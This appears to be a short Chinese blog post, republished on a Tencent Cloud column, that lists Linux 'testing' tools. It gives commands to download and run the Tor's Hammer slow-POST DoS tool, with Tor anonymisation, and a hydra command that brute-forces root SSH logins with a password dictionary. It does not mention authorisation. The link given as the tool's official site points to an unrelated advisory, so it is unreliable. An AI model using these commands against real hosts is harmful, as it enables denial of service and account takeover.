首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >linux系统中几款简单好用测试软件 原

linux系统中几款简单好用测试软件 原

作者头像
阿dai学长
发布2019-04-03 10:26:29
1.3K0
发布2019-04-03 10:26:29
举报
文章被收录于专栏:阿dai_linux阿dai_linux阿dai_linux

仿DDoS攻击工具

http://netsecurity.51cto.com/art/201406/442756.htm 个人测试使用的是:Tor's hammer,官方网站:https://packetstormsecurity.com/files/145109/Linux-mincore-Kernel-Heap-Page-Disclosure.html。 操作很简单,下载之后解压就可以直接使用:

# mkdir tor_syn_test
# cd tor_syn_test

# wget https://dl.packetstormsecurity.net/DoS/torshammer.tgz  

# tar zxf torshammer.tgz

# ls
socks.py  socks.pyc  terminal.py  terminal.pyc  torshammer.py  torshammer.tgz

使用说明:
# ./torshammer.py -h

/*
 * Tor's Hammer 
 * Slow POST DoS Testing Tool
 * entropy [at] phiral.net
 * Anon-ymized via Tor
 * We are Legion.
 */

./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
 -t|--target <Hostname|IP>
 -r|--threads <Number of threads> Defaults to 256
 -p|--port <Web Server Port> Defaults to 80
 -T|--tor Enable anonymising through tor on 127.0.0.1:9050
 -h|--help Shows this help

Eg. ./torshammer.py -t 192.168.1.100 -r 256

端口触探

http://blog.csdn.net/lee244868149/article/details/39177755

暴力破解工具hydra

http://blog.csdn.net/yafeichang/article/details/53502869

//ssh登录破解示例:
#  hydra -l root -P rkolin2.txt 192.168.123.123 ssh   
 //rkolin2.txt为提前准备的密码字典  

说明:密码字典需要自己准备,推荐 https://pan.baidu.com/s/1jGiVsMi#list/path=%2F

系统提权

http://blog.csdn.net/bnxf00000/article/details/64906539

(adsbygoogle = window.adsbygoogle || []).push({});

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2017/11/27 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 仿DDoS攻击工具
  • 端口触探
  • 暴力破解工具hydra
  • 系统提权
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档